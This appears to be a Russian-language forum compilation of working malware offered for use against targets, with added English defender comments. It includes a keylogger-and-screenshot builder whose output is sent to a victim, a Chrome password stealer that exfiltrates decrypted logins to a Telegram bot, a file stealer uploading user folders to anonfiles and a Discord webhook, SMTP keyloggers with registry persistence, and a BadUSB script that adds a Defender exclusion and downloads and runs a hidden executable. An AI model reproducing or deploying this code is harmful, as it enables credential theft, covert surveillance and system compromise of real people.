    # ParallelThread.run and resource_path use; they are absent from the
    # import list at the top of the file, which an analyst skimming that list
    # could miss.
    import sys
    from zipfile import ZipFile
    import os
    import getpass
    import requests

    # Standard Qt start-up: show the decoy window and enter the event loop.
    app = QApplication(sys.argv)
    ex = MyWidget()
    ex.show()
    sys.exit(app.exec_())

KeyLoggerScreenshot - это инструмент, который регистрирует клавиши, делает скриншот каждые 20 секунд, записывает щелчки мыши с позиционированием X и Y и записывает звук цели. Данные будут отправлены вам через сокеты.
Следуйте инструкциям, чтобы создать свой собственный сервер в "KeyLoggerScreenshot".
Лцчше запускайте KeyLoggerScreenshot на Kali Linux. Но это работает на всех дистрибутивах Linux.
Если вы пользователь Linux. Изменить на root:

sudo -i


Использование:​


sudo apt install python3 && python3-pip
sudo apt-get install portaudio19-dev python3-pyaudio
pip3 install BetterPrinting pynput pyautogui Pillow KeyloggerScreenshot pyaudio




Напишите свой IP-адрес в KLS_START.PY:
python KLS_start.py -aip 127.0.0.1

Для создания файла:
python KLS_start.py -aip 127.0.0.1 -cf

Вы можете отправить созданный файл своей целе

Вы также можете указать имя файла просто написать имя файла после -cf
python KLS_start.py -aip 127.0.0.1 -cf test.py

Для создания сервера с теми же портами, что и цель:
python KLS_start.py -aip 127.0.0.1 -cf -ds

Чтобы увидеть все порты:
python KLS_start.py -aip 127.0.0.1 -cf -ds -p

Для активации симуляции:
python KLS_start.py -aip 127.0.0.1 -cf -ds -p -sim

Стандартное имя файла является target.py

Вы также можете указать секунды, которые будут запускаться у цели
python KLS_start.py -aip 127.0.0.1 -cf test.py -s 120

Секунды по умолчанию 60

Чтобы указать ссылку, которая будет открыта при выполнении:
python KLS_start.py -aip 127.0.0.1 -cf test.py -s 120 -phs https://www.google.com


После запуска кода вы можете отправить созданное имя файла.
Вы можете отправить EXE файл, созданный из target.py в Auto-Py-To-Exe.
KeyLoggerScreenshot очень прост в использовании.
Серверы можно использовать в любой ОС. Клиент должен быть ОС Windows.



KLS_start.py

Python:
import os
# Import-time fallback. If importing pyautogui raises KeyError (presumably a
# headless environment with no display variable; confirm), the two listed
# files inside the ./KeyloggerScreenshot directory are rewritten in place with
# five GUI/input-related import lines removed.
# Analyst note: this modifies files of an installed package on the operator's
# side at start-up; it runs relative to the current working directory.
try:
    import pyautogui as pg

except KeyError:
    files = ["Server_keylogger.py", "Keylogger_Target.py"]
    for this_file in files:
        os.chdir("KeyloggerScreenshot")
        # Read every line without its trailing newline.
        with open(this_file, "r+") as file:
            data = [line.replace("\n", "") for line in file]

        # Write the file back, skipping lines that exactly match one of the imports.
        with open(this_file, "w+") as file:
            for each in data:
                if each not in ["import PIL.Image", "from pynput import keyboard", "from pynput.mouse import Listener",
                                "import tkinter as tk", "import pyautogui as pg"]:
                    file.write(f"{each}\n")
        os.chdir("..")

import KeyloggerScreenshot as ks
import sys
import threading
import random
import requests
import subprocess

gui = """
    __ __              __                                 _____                                       __            __
   / //_/___   __  __ / /____   ____ _ ____ _ ___   _____/ ___/ _____ _____ ___   ___   ____   _____ / /_   ____   / /_
  / ,<  / _ \ / / / // // __ \ / __ `// __ `// _ \ / ___/\__ \ / ___// ___// _ \ / _ \ / __ \ / ___// __ \ / __ \ / __/
 / /| |/  __// /_/ // // /_/ // /_/ // /_/ //  __// /   ___/ // /__ / /   /  __//  __// / / /(__  )/ / / // /_/ // /_
/_/ |_|\___/ \__, //_/ \____/ \__, / \__, / \___//_/   /____/ \___//_/    \___/ \___//_/ /_//____//_/ /_/ \____/ \__/
            /____/           /____/ /____/
"""
lst = sys.argv

try:
    if "-aip" in lst:  # "aip" stands for address ip
        idx = lst.index("-aip")
        try:
            global simulation
            global boolean

            cmd = subprocess.check_output(["netstat", "-ano"])
            all = cmd.split()

            working_ports = []
            zahlen = [str(zahl) for zahl in range(0, 11)]

            for each in all:
                str_each = str(each)
                if ":" in str_each:
                    switch = str_each[::-1]
                    this_port = ""
                    for port in switch:
                        if port not in zahlen: pass
                        if port == ":": break
                        this_port += port

                    another_switch = this_port[::-1]
                    if "'" in another_switch: another_switch = another_switch.replace("'", "")

                    if len(another_switch) == 4:
                        working_ports.append(another_switch)

            ipaddress = str(lst[idx + 1])

            zahlen = "123456789"
            nummer = 0
            port_numbers = []
            while nummer != 4:
                nummer += 1
                random_port = "".join(random.sample(zahlen, 4))
                if random_port in working_ports:
                    continue
                port_numbers.append(random_port)

            port_photos = int(port_numbers[0])
            port_keylogger = int(port_numbers[1])
            port_listener = int(port_numbers[2])
            port_time = int(port_numbers[3])

            if "-sim" in lst:
                try:
                    print("The simulation is activated")
                    simulation = "simulater=True"
                    boolean = True

                except IndexError:
                    quit()
            else:
                simulation = "simulater=False"
                boolean = False

            if "-ds" in lst:  # "ds" for demon server
                try:
                    server_code = f'''
import KeyloggerScreenshot as ks
import threading
ip = "{ipaddress}"
server_photos = ks.ServerPhotos(ip, {port_photos})
server_keylogger = ks.ServerKeylogger(ip, {port_keylogger}, {simulation})
server_listener = ks.ServerListener(ip, {port_listener})
server_time = ks.Timer(ip, {port_time})
threading_server = threading.Thread(target=server_photos.start)
threading_server.start()
threading_server2 = threading.Thread(target=server_keylogger.start)
threading_server2.start()
threading_server3 = threading.Thread(target=server_listener.start)
threading_server3.start()
threading_server4 = threading.Thread(target=server_time.start_timer)
threading_server4.start() '''

                    if os.path.exists("demon_server.py"):
                        os.remove("demon_server.py")
                    with open("demon_server.py", "a+") as file:
                        file.write(server_code)

                    print('"demon_server.py" HAS BEEN CREATED')
                except IndexError:
                    quit()
            if "-p" in lst:  # "p" stands for ports
                idx_port = lst.index("-p")
                try:
                    print('ALL THE NUMBERS HAVE BEEN SAVED TO "ports.py"')
                    print(
                        f"\nport_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}\n")
                    with open("ports.py", "a+") as file:
                        file.write(
                            f"port_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}")

                except IndexError:
                    quit()

            if "-s" in lst:  # "s" stands for seconds
                idx_s = lst.index("-s")
                try:
                    if "-" in lst[idx_s + 1]:
                        print(gui)
                        print("PLEASE SPECIFY YOUR SECONDS -s")
                        quit()

                    seconds = int(lst[idx_s + 1])
                    if seconds < 60:
                        print(gui)
                        print(f"SECONDS MUST BE GREATER THAN 60")
                        quit()

                except IndexError:
                    seconds = 60
            else:
                seconds = 60

            if "-phs" in lst:
                global phishing_name
                phishing_name = None
                try:
                    phs_idx = lst.index("-phs")
                    phishing_name = lst[phs_idx + 1]
                    if "-cf" not in lst:
                        print(gui)
                        print(
                            'YOU HAVE NOT SPECIFIED THE FILE. IF YOU NEED HELP SIMPLY TYPE "python KLS_start.py -help" IN YOUR TERMINAL')
                        sys.exit()
                    try:
                        req = requests.get(phishing_name)

                    except requests.exceptions.RequestException:
                        print(gui)
                        print(f'WEBSITE: {phishing_name} IS NOT AVAILABLE')
                        sys.exit()

                except IndexError:
                    print(gui)
                    print("NO LINK HAS BEEN TYPED")
                    sys.exit()

            else:
                phishing_name = None

            if "-cf" in lst:  # "cf" stands for Create file
                idx_cf = lst.index("-cf")
                if phishing_name is not None:
                    phishing_value = f'"{phishing_name}"'
                else:
                    phishing_value = None

                try:

                    filename = lst[idx_cf + 1]
                    if not filename.endswith("py"):
                        data = filename.split(".")
                        filename = f"{data[0]}.py"
                    if "-" in filename:
                        filename = "target.py"

                    if os.path.exists(filename):
                        os.remove(filename)

                    if phishing_name is not None: print(
                        f'LINK: {phishing_name} WILL BE OPEND WHEN {filename} IS EXECUTED')

                    with open(f"{filename}", "a+") as file:
                        file.write(
                            f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}, phishing_web={phishing_value}) \nkey_client.start()")
                    print(f"{filename.upper()} has been created")

                except IndexError:
                    with open("target.py", "a+") as file:
                        file.write(
                            f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}, phishing_web={phishing_value}) \nkey_client.start()")
                    print("TARGET.PY HAS BEEN CREATED YOU CAN SEND THIS TO YOUR TARGET")

            server_photos = ks.ServerPhotos(ipaddress, port_photos)

            server_keylogger = ks.ServerKeylogger(ipaddress, port_keylogger, simulater=boolean)

            server_listener = ks.ServerListener(ipaddress, port_listener)

            server_time = ks.Timer(ipaddress, port_time)

            threading_server = threading.Thread(target=server_photos.start)
            threading_server.start()

            threading_server3 = threading.Thread(target=server_listener.start)
            threading_server3.start()

            threading_server4 = threading.Thread(target=server_time.start_timer)
            threading_server4.start()

            threading_server2 = threading.Thread(target=server_keylogger.start)
            threading_server2.start()
            threading_server2.join()

        except IndexError:
            print(gui)
            print("YOU FORGET TO INSERT YOUR IP")

    elif "-aip" not in lst and "-help" not in lst:
        print(gui)
        print("PLEASE INSERT YOUR IP WITH -aip")

    if "-help" in lst:
        print(gui)
        print(
            "\n-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER\n-ds  CREATES A SERVER WITH THE SAME PORTS AS THE TARGET\n-sim ACTIVATES SIMULATION\n-phs OPENS A LINK WHEN THE KEYLOGGER IS EXECUTED")

except OSError:
    print('CHECK YOUR IP-ADDRESS WITH "ipconfig" ON WINDOWS AND "ifconfig" ON LINUX')

Chrome stealer паролей на Windows пересылает архив в ваш бот TG.

TELEGRAM_TOKEN='123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11'
TG_ID=1163891909


Использование:​

1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Получите и поместите токен и id телеги.
3) Запустите команды для создания EXE, переименуйте и отправьте.

Создайте exe или воспользуйтесь Python обфускатором.


chromepy.py


Python:
import os
import re
import sys
import json
import base64
import sqlite3
import requests
import win32crypt
from Crypto.Cipher import AES
import shutil
import csv

TELEGRAM_TOKEN = 'YOUR_TELEGRAM_BOT_TOKEN'
TG_ID = 'YOUR_TELEGRAM_ID'

CHROME_PATH_LOCAL_STATE = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data\Local State"%(os.environ['USERPROFILE']))
CHROME_PATH = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data"%(os.environ['USERPROFILE']))

def get_secret_key():
    """Recover the AES key Chrome stores in the profile's ``Local State`` file.

    Reads ``os_crypt.encrypted_key`` from the JSON file, base64-decodes it,
    drops the first five bytes and passes the rest to DPAPI
    (``CryptUnprotectData``). Returns the unwrapped key, or ``None`` on any
    error.

    Defender note: DPAPI unwraps the key for any process running as the same
    Windows user, so this step needs no elevation. A non-browser process
    reading ``Local State`` and then a profile's ``Login Data`` is the
    behaviour to detect (MITRE ATT&CK T1555.003).
    """
    try:
        with open( CHROME_PATH_LOCAL_STATE, "r", encoding='utf-8') as f:
            local_state = f.read()
            local_state = json.loads(local_state)
        secret_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
        # Skip the 5-byte prefix that precedes the DPAPI blob.
        secret_key = secret_key[5:]
        secret_key = win32crypt.CryptUnprotectData(secret_key, None, None, None, 0)[1]
        return secret_key
    except Exception as e:
        print("%s"%str(e))
        print("[ERR] Chrome secretkey cannot be found")
        return None
 
def decrypt_payload(cipher, payload):
    """Return ``cipher.decrypt(payload)``; no authentication tag is verified here."""
    return cipher.decrypt(payload)

def generate_cipher(aes_key, iv):
    """Build an AES-GCM cipher object from the recovered key and the per-record nonce."""
    return AES.new(aes_key, AES.MODE_GCM, iv)

def decrypt_password(ciphertext, secret_key):
    """Decrypt one ``password_value`` blob with the key from ``get_secret_key``.

    The blob is sliced by fixed offsets: bytes 3..14 are used as the nonce and
    everything from byte 15 up to the last 16 bytes as the ciphertext. The
    trailing 16 bytes are discarded and never verified. Returns the decoded
    text, or an empty string on any error.
    """
    try:
        # The first three bytes are skipped (a version tag in Chrome's format).
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        cipher = generate_cipher(secret_key, initialisation_vector)
        decrypted_pass = decrypt_payload(cipher, encrypted_password)
        decrypted_pass = decrypted_pass.decode()
        return decrypted_pass
    except Exception as e:
        print("%s"%str(e))
        print("[ERR] Unable to decrypt, Chrome version <80 not supported. Please check.")
        return ""
 
def get_db_connection(chrome_path_login_db):
    """Copy a profile's ``Login Data`` database and open the copy with sqlite3.

    The copy is written to ``Loginvault.db`` in the current working directory
    (presumably because the live file may be locked by the browser; not stated
    in the code). Returns the connection, or ``None`` on any error.

    Defender note: a file named ``Loginvault.db`` appearing outside the
    browser profile is a host-based indicator for this sample.
    """
    try:
        print(chrome_path_login_db)
        shutil.copy2(chrome_path_login_db, "Loginvault.db")
        return sqlite3.connect("Loginvault.db")
    except Exception as e:
        print("%s"%str(e))
        print("[ERR] Chrome database cannot be found")
        return None

# Staging directory for the CSV and the archive. The name is relative, so it is
# created in whatever directory the process was started from. This runs at
# import time, before the __main__ guard.
if os.path.exists('shit'):
    print('you''ve shitted earlier')
else:
    os.mkdir('shit')

if __name__ == '__main__':
    # Analyst summary of the flow below:
    #   1. write decrypted logins of every matching Chrome profile to a CSV in
    #      the staging directory (plaintext credentials on disk),
    #   2. zip the staging directory,
    #   3. POST the archive to an api.telegram.org sendDocument URL,
    #   4. delete the staging directory and the archive.
    # Step 4 removes the local artefacts, so network telemetry (a request to
    # api.telegram.org from a non-browser, non-Telegram process) and
    # file-creation events are the more durable evidence (MITRE ATT&CK
    # T1555.003 / T1567).
    try:
        with open('shit\decrypted_password.csv', mode='w', newline='', encoding='utf-8') as decrypt_password_file:
            csv_writer = csv.writer(decrypt_password_file, delimiter=',')
            csv_writer.writerow(["index","url","username","password"])
            secret_key = get_secret_key()
            # Profile folders are selected by name from the User Data directory.
            folders = [element for element in os.listdir(CHROME_PATH) if re.search("^Profile*|^Default$",element)!=None]
            for folder in folders:
                chrome_path_login_db = os.path.normpath(r"%s\%s\Login Data"%(CHROME_PATH,folder))
                conn = get_db_connection(chrome_path_login_db)
                if(secret_key and conn):
                    cursor = conn.cursor()
                    cursor.execute("SELECT action_url, username_value, password_value FROM logins")
                    for index,login in enumerate(cursor.fetchall()):
                        url = login[0]
                        username = login[1]
                        ciphertext = login[2]
                        # Rows with an empty URL, user name or password blob are skipped.
                        if(url!="" and username!="" and ciphertext!=""):
                            decrypted_password = decrypt_password(ciphertext, secret_key)
                            print("Sequence: %d"%(index))
                            print("URL: %s\nUser Name: %s\nPassword: %s\n"%(url,username,decrypted_password))
                            print("*"*50)
                            csv_writer.writerow([index,url,username,decrypted_password])
                    cursor.close()
                    conn.close()
                    # The temporary database copy is removed after each profile.
                    os.remove("Loginvault.db")

        decrypt_password_file.close()
        shutil.make_archive('shit', 'zip', 'shit')
        file = open('shit.zip', 'rb')
        multipart_form_data = {
            'chat_id': (None, TG_ID),
            'document': ('shit.zip', file),
        }

        response = requests.post(f'https://api.telegram.org/{TELEGRAM_TOKEN}/sendDocument', files=multipart_form_data)
        file.close()
        # Clean-up of staging artefacts.
        shutil.rmtree('shit')
        os.remove('shit.zip')
    except Exception as e:
        print("[ERR] "%str(e))

Простой инструмент для загрузки Desktop, Download и Document файлов в Anonfiles и отправка через Discord Webhook
Можете настроить стилер файлов под любой спецефический интерес(сессии кошельки)


Использование:​


1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Получите Discord Webhook и поместите в webhook = "" Введите свой webhook между кавычками.
3) Запустите команды для создания EXE, переименуйте и отправьте


NoxiusFileStealer.py


Python:
import zipfile
import shutil
import os
import requests
import multiprocessing
from discord import SyncWebhook, Embed

webhook = "YOUR WEBHOOK HERE"

dirs_to_zip = [
    os.path.join(os.environ.get("USERPROFILE"), "Downloads"),
    os.path.join(os.environ.get("USERPROFILE"), "Desktop"),
    os.path.join(os.environ.get("USERPROFILE"), "Documents"),
    os.path.join(os.environ.get("USERPROFILE"), "Pictures"),
    os.path.join(os.environ.get("USERPROFILE"), "Videos"),
]

zip_filename = f"NoxiusFileStealer-{os.getlogin()}.zip"
if os.path.exists(zip_filename):
    os.remove(zip_filename)

def zip_files(dirs_to_zip, zip_filename):
    """Archive every file found under the given directories into one zip.

    Each directory is walked recursively. Entries are stored under
    ``<top-level folder name>/<file name>``, so the intermediate
    sub-directory structure is not kept in the archive.

    Defender note: a single process reading the whole of Downloads, Desktop,
    Documents, Pictures and Videos and writing one large archive is bulk
    collection behaviour (MITRE ATT&CK T1005 / T1560) and is visible in file
    access telemetry.
    """
    with zipfile.ZipFile(zip_filename, "w") as zip_file:
        for dir_path in dirs_to_zip:
            folder_name = os.path.basename(dir_path)
            for root, _, files in os.walk(dir_path):
                for file in files:
                    file_path = os.path.join(root, file)
                    zip_file.write(file_path, arcname=os.path.join(folder_name, file))

if __name__ == '__main__':
    # Analyst summary: the archive is built in a child process, uploaded to a
    # public file-hosting API, and the resulting short link is sent to a
    # Discord webhook inside an embed.
    # Network indicators visible in this block: api.anonfiles.com,
    # cdn.franafp.com (thumbnail/icon URL) and the configured Discord webhook
    # URL. Requests to a file-sharing API followed by a webhook call from a
    # non-browser process are the pattern to hunt for (MITRE ATT&CK T1567).
    multiprocessing.freeze_support()
    p = multiprocessing.Process(target=zip_files, args=(dirs_to_zip, zip_filename))
    p.start()
    p.join()

    # The archive is opened from %LOCALAPPDATA%\Temp\<zip_filename>.
    with open(f"{os.getenv('LOCALAPPDATA')}\\Temp\\{zip_filename}", "rb") as file:
        response = requests.post("https://api.anonfiles.com/upload", files={"file": file})
    link = response.json()["data"]["file"]["url"]["short"]
    # The embed carries the download link plus the victim's login name inside
    # the folder paths and the archive name.
    embed = Embed(title="Files Dumped", description=f"Download the files [here]({link})", color=0x000001)
    embed.set_footer(text="Noxius File Stealer")
    embed.set_thumbnail(url="https://cdn.franafp.com/images/big-noxius.png")
    embed.set_author(name="Noxius File Stealer", url="https://github.com/Noxius-TM/Noxius-File-Stealer", icon_url="https://cdn.franafp.com/images/big-noxius.png")
    embed.add_field(name="Downloads", value=f"C:\\Users\\{os.getlogin()}\\Downloads")
    embed.add_field(name="Desktop", value=f"C:\\Users\\{os.getlogin()}\\Desktop")
    embed.add_field(name="Documents", value=f"C:\\Users\\{os.getlogin()}\\Documents")
    embed.add_field(name="Pictures", value=f"C:\\Users\\{os.getlogin()}\\Pictures")
    embed.add_field(name="Videos", value=f"C:\\Users\\{os.getlogin()}\\Videos")
    embed.add_field(name="Zip File", value=f"{zip_filename}")
    # The module-level string `webhook` is rebound to the webhook client object here.
    webhook = SyncWebhook.from_url(webhook , session=requests.session())
    webhook.send(embed=embed)

Keylogger отправляет через SMTP на примере Gmail
Вставляете мыло, пасс и свой SMTP сервер, исправьте на свой лимит нажатых клавиш email_char_limit

keylogger.py


Python:
import smtplib
import subprocess
from pynput.keyboard import Key, Listener

email = '@gmail.com'
password = ''
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login(email, password)

fullog = ''
words = ''
email_char_limit = 100

def on_press(key):
    """pynput key-press callback that buffers keystrokes and triggers sending.

    Characters are collected in the global ``words``; on space or enter the
    word is appended to the global ``fullog``, and once ``fullog`` reaches
    ``email_char_limit`` characters ``send_log()`` is called and the buffer is
    cleared. Returning ``False`` (on Esc) stops the listener.

    Defender note: the callback is registered through ``pynput``'s Listener,
    i.e. a user-level global keyboard hook that needs no elevation (MITRE
    ATT&CK T1056.001). The buffer lives only in memory; nothing is written to
    disk by this function.
    """
    global words
    global fullog
    global email
    global email_char_limit

    if key == Key.space or key == Key.enter:
        words += ' '
        fullog += words
        words = ''

        if len(fullog) >= email_char_limit:
            send_log()
            fullog = ''
    elif key == Key.shift_l or key == Key.shift_r:
        # Shift presses are ignored entirely.
        return
    elif key == Key.backspace:
        # Mirror the deletion in the buffered word.
        words = words[:-1]
    else:
        # str(key) is trimmed by one character on each side before buffering.
        char = f'{key}'
        char = char[1:-1]
        words += char

    if key == Key.esc:
        return False
 
def send_log():
    """Mail the buffered keystrokes over the module-level SMTP session.

    Sender and recipient are the same configured address, and the message body
    is the raw ``fullog`` string. The session is the ``SMTP_SSL`` connection to
    ``smtp.gmail.com:465`` opened at import time.

    Defender note: an outbound SMTPS connection from a process that is not a
    mail client is the network-side signal; the account password sits in the
    script in clear text and is recoverable from a captured sample.
    """
    server.sendmail(
        email,
        email,
        fullog
    )

with Listener(on_press = on_press) as listener:
    listener.join()

Keylogger отправляет через SMTP на примере Mailtrap

Меняйте на свой SMTP если хотите
SMTP_SERVER = 'sandbox.smtp.mailtrap.io' # Mailtrap smtp
SMTP_PORT = 2525 # Mailtrap port
SMTP_USERNAME = 'yourUsernameHere'
SMTP_PASSWORD = 'yourPasswordHere'
RECIPIENT = 'yourEmailHere'

Жертве необходимо запустить
python keylogger.py

Или как exe

sudo apt install p

ython3 && python3-pip
pip3 install pyinstaller

pyinstaller --onefile --noconsole --hidden-import "Pillow pynput" keylogger.py
Можете добавить иконку icon=


keylogger.py​


Python:
import time
import os
import winreg
import win32gui
import win32con
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.utils import COMMASPACE
from email import encoders
from pynput.keyboard import Key, Listener
import socket
"""
  __  __                ___  
 |  \/  |___ _____ __ _|_ _|__ ___
 | |\/| / -_) _ \ V  V /| |/ _/ -_)
 |_|  |_\___\___/\_/\_/|___\__\___|
                             
            Keyl0gger
"""
pcname = socket.gethostname()

# Email configuration
SMTP_SERVER = 'sandbox.smtp.mailtrap.io' #Mailtrap smtp
SMTP_PORT = 2525 #Mailtrap port
SMTP_USERNAME = 'yourUsernameHere'
SMTP_PASSWORD = 'yourPasswordHere'
RECIPIENT = 'yourEmailHere'

# Add program to Windows startup
def add_to_startup():
    """Register this script under the current user's ``Run`` registry key.

    Writes a ``REG_SZ`` value named ``KeystrokeLogger`` whose data is the
    absolute path of this file.

    Defender note: this is per-user logon persistence (MITRE ATT&CK
    T1547.001) and needs no elevation. The value name ``KeystrokeLogger``
    under ``HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`` is a
    host-based indicator; registry auditing or autoruns review will show it.
    """
    key = winreg.HKEY_CURRENT_USER
    key_value = "Software\Microsoft\Windows\CurrentVersion\Run"
    with winreg.OpenKey(key, key_value, 0, winreg.KEY_WRITE) as key:
        program_path = os.path.abspath(__file__)
        winreg.SetValueEx(key, "KeystrokeLogger", 0, winreg.REG_SZ, program_path)

# Hide the console window
def hide_console():
    """Hide whichever window is in the foreground when this is called.

    The handle comes from ``GetForegroundWindow``, so the hidden window is the
    one that has focus at call time, not necessarily this program's console
    (MITRE ATT&CK T1564.003).
    """
    hide_window = win32gui.GetForegroundWindow()
    win32gui.ShowWindow(hide_window, win32con.SW_HIDE)

# Send the keystrokes as an email attachment
def send_email(log_file_path):
    """Send the file at *log_file_path* as a base64 e-mail attachment.

    Builds a multipart message whose subject contains the host name
    (``pcname``), attaches the file as ``application/octet-stream``, then
    connects to ``SMTP_SERVER:SMTP_PORT``, upgrades with STARTTLS, logs in and
    sends.

    Defender note: the subject line leaks the victim host name, and the SMTP
    credentials are module constants in clear text. An outbound SMTP session
    on a non-standard port from a non-mail process is the network-side signal.
    """
    msg = MIMEMultipart()
    msg['From'] = SMTP_USERNAME
    msg['To'] = RECIPIENT
    msg['Subject'] = f'Keylogs from {pcname}'
    msg.attach(MIMEText('MeowIce\'s Key Logger'))

    with open(log_file_path, 'rb') as f:
        attachment = MIMEBase('application', 'octet-stream')
        attachment.set_payload(f.read())
        encoders.encode_base64(attachment)
        attachment.add_header('Content-Disposition', 'attachment', filename=os.path.basename(log_file_path))
        msg.attach(attachment)

    # A new SMTP session is opened and closed for every call.
    smtp = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)
    smtp.starttls()
    smtp.login(SMTP_USERNAME, SMTP_PASSWORD)
    smtp.sendmail(SMTP_USERNAME, RECIPIENT, msg.as_string())
    smtp.quit()

# Log the keystrokes
def on_press(key):
    """Key-press callback: append a text form of the key to the log file.

    Passed to pynput's Listener as on_press, so it is called once per key
    press. Space, Enter, Shift, Ctrl, Backspace, Alt and Tab are written as
    fixed markers; keys with a char attribute are written as that character;
    anything else is written as str(key). This is input capture by
    keylogging (MITRE ATT&CK T1056.001).

    Defender notes: the log file is opened in append mode on every key
    press, so file-write telemetry shows a steady stream of tiny appends to
    one file from an interpreter process.
    """
    with open('%AppData%\keystrokes.log', 'a') as f:
        if key == Key.space:
            f.write(" ")
        elif key == Key.enter:
            f.write("<Return>\n")
        elif key == Key.shift:
            f.write("<Shift>")
        elif key == Key.ctrl:
            f.write("<Ctrl>")
        elif key == Key.backspace:
            f.write("<Backspace>")
        elif key == Key.alt:
            f.write("<Alt>")
        elif key == Key.tab:
            f.write("<Tab>")
        elif hasattr(key, 'char'):
            f.write(key.char)
        else:
            f.write(str(key))

# Main program loop
if __name__ == '__main__':
    # Sequence: install Run-key persistence, hide the foreground window, then
    # start the keyboard listener.
    add_to_startup()
    hide_console()
    with Listener(on_press=on_press) as listener:
        # Defender note: the loop mails the log and deletes it once every 60
        # seconds, so outbound mail sessions recur at a fixed interval and
        # the log file is repeatedly created and removed.
        while True:
            time.sleep(60)
            try:
                send_email('%AppData%\keystrokes.log')
                os.remove('%AppData%\keystrokes.log')
            except Exception as e:
                print(f'Error sending email: {e}')

Keylogger отправляет через Discord Webhook

Установка:

sudo apt install python3 && python3-pip
pip3 install pynput PyInstaller

Изменение в файле Mugger.py - discord = "DISCORD_WEBHOOK"

python3 -m PyInstaller Mugger.py --onefile


Загрузите exe на сервер, локальный сервер Python и т.д.
Делайте, как хотите.


BADUSB

Отредактируйте строку LINK_TO_EXE на ссылку на ваш только что созданный exe файл.
Этот скрипт устанавливает исключение для C:\temp!!!!!!
Когда закончите, обязательно сбросьте путь исключения!!!!!!!!

Сбросить путь исключения для сценария Badusb после завершения, в admin powershell
Remove-MpPreference -ExclusionPath "C:\temp"

Или запустите файл ExclusionRemove.txt с флиппером
О флиппере https://thecode.media/pasha-flipper/ и https://vc.ru/tech/472914-flipper-z...hatleniya-i-dostupnye-na-starte-razvlecheniya


ExclusionRemove.txt


Код:
REM Title: Remove Exclusion set on C:\temp IF using badusb ducky script

DELAY 1000

GUI r

DELAY 500

STRING powershell Start-Process powershell -Verb runAs

ENTER

DELAY 3000

ALT y

DELAY 1500

STRING Remove-MpPreference -ExclusionPath "C:\temp"

ENTER

STRING echo "Done Remove ExclusionPath at C:\temp"

ENTER

DELAY 5000

STRING exit

ENTER

mugger.txt


Код:
REM Title: Mugger KeyLogger
REM Description: Keylogger that send to discord webhook for flipper zero
REM Target: Windows
REM Defender note: this is HID keystroke injection. It opens an elevated PowerShell,
REM adds a Microsoft Defender path exclusion for C:\temp (MITRE ATT&CK T1562.001),
REM downloads a file into that directory (T1105) and starts it with a hidden window.
REM Detection: Defender configuration changes are logged as event ID 5007 in the
REM Microsoft-Windows-Windows Defender/Operational log; alert on new ExclusionPath
REM values, and on powershell.exe launched from the Run dialog that then spawns an
REM elevated powershell.exe and creates an executable under a freshly excluded path.
REM Mitigation: manage exclusions centrally with local administrator merge disabled,
REM set UAC to prompt for credentials rather than consent, and restrict unknown USB
REM HID devices on sensitive hosts.
DELAY 1000
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 2000
STRING cd C:\; mkdir temp; cd temp; Add-MpPreference -ExclusionPath "C:\temp"
ENTER
DELAY 500
STRING $down = New-Object System.Net.WebClient; $url = 'LINK_TO_EXE'; $file = 'C:\temp\life_insurance.exe'; $down.DownloadFile($url, $file); Start-Process -FilePath life_insurance.exe -WindowStyle Hidden;
ENTER
DELAY 5000
STRING exit

Mugger.py

Python:
import threading as thr
from json import dumps
from pynput.keyboard import Listener, Key
from urllib.request import Request, urlopen

discord = 'DISCORD_WEBHOOK' # Вставьте свой
timer = 60 # Секунды

class keyScape:
        """Buffer key presses in memory and post them to a webhook on a timer.

        Captured keys are held in self.keys (never written to disk by this
        class) and sent as a JSON embed to the configured webhook URL every
        self.timer seconds. This combines keylogging (MITRE ATT&CK T1056.001)
        with exfiltration over a webhook (T1567.004).

        Defender notes: there is no log file to find, so detection rests on
        process and network telemetry: an interpreter or packed executable
        that receives keyboard events and makes periodic HTTPS POSTs to a
        chat-service webhook endpoint. The request carries a fixed, dated
        browser User-Agent string (see send), which does not match a real
        browser on the host. Blocking webhook endpoints of chat services that
        the organisation does not use removes the channel.
        """
        def __init__(self, discord, timer):
                # keys: accumulated capture buffer; webhook: destination URL;
                # timer: seconds between sends.
                self.keys = ''
                self.webhook = discord
                self.timer = timer

        def info(self):
                """Send and clear the buffer if non-empty, then re-arm the timer."""
                if len(self.keys) != 0:
                        self.send()
                        self.keys = ''
                # Schedules itself again, so a new timer thread is started on
                # every interval.
                thr.Timer(self.timer, self.info).start()

        def keyPress(self, key):
                """Listener callback: append a text form of the key to the buffer."""
                if key == Key.space:
                        key = '[space]'
                if key == Key.enter:
                        key = '[enter]'
                if key == Key.backspace:
                        key = '[backspace/delete]'
                if key == Key.shift:
                        key = '[shift]'
                if key == Key.tab:
                        key = '[tab]'

                # str(key) for character keys is quoted; the quotes are stripped.
                key = str(key).replace("'", "")
                self.keys += key

#       def onRelease(self, key):
#               if key == Key.esc:
#                       return False

        def record(self):
                """Start the send timer, then block on the keyboard listener."""
                self.info()
